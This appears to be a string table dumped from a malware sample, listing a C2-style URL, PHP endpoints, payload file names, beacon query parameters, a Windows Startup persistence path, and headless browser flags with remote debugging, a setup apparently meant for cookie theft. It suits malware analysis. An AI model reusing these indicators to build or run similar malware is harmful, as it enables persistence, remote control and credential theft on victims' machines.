strings = {
0x690A7C: "76E894005c2DE86E40b032a0931D2ABC05C6eB36ACb1C18F5b640aD24Bbc9454",
0x56F978: "OzYuOT02LjY1LDUw",
0x56F990: "ZWN0bXtjYXJtZ2xjaXxjbWFya28sYW9t",
0x56F9A8: "Y2xnbWRpbmFpaGRmZnpnZHJpYWssYW9t",
0x69098C: "1950BC4F01",
0x6906F8: "17B4C29833",
0x69080C: "EEE592271B",
0x690590: "CullinetProgram",
0x690B90: "680FDC",
0x690578: "ACDB39",
0x690A34: "09-23",
0x690860: "rhnu.dll",
0x690650: "nyxhv",
0x6905D8: "B3C830CA-4433-CC3A-6737",
0x6909A4: "uhapy",
0x6908F0: "http://manjitaugustuswaters.com",
0x690740: "jnml.php",
0x690638: "grfq.php",
0x690698: "tsml.zip",
0x690A4C: "tsml_nonir.zip",
0x690BF0: "wvxk.zip",
0x690B0C: "wvxk_x64.zip",
0x690B78: "wsau.exe",
0x6905C0: "nico=",
0x690B3C: "&yfat=",
0x690A04: "&zbce=",
0x690AAC: "&qiob=",
0x6908A8: "&jwrb=",
0x6907AC: "&nsmb=",
0x6906B0: "&inau=",
0x690608: "&wpof=",
0x69077C: "&chja=",
0x6909BC: "&ehin=",
0x6908C0: "&vmzn=",
0x6909EC: "&ouej=",
0x690944: "&rzya=",
0x690890: "&cdyt=",
0x69092C: "&rich=",
0x690794: "&clsx=",
0x690ADC: "&hwqy=",
0x6905A8: "?selk=",
0x690BD8: "vdle",
0x690BC0: "down/",
0x690560: "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",
0x69083C: "nircmdc.exe",
0x690BA8: "zip.exe",
0x690680: "/c ping localhost -n 6 > nul &",
0x690974: "/c ping localhost -n 10 > nul &",
0x6905F0: "cout",
0x6907F4: "http://",
0x690AC4: "true",
0x690908: "false",
0x6909D4: "void",
0x690A94: ".asd",
0x690AF4: ???,
0x690824: ???,
0x690620: "[@]",
0x69095C: ???,
0x690A64: ???,
0x6908D8: "[|]",
0x6907DC: "[*]",
0x690710: ".png",
0x690668: ".exe",
0x690B54: ".lnk",
0x690764: ".vbs",
0x690B24: ".txt",
0x690728: ".7z",
0x6906E0: ".bak",
0x690A1C: " --headless=old --disable-gpu --remote-debugging-port=0 ",
0x6907C4: "MyTasks\\"
}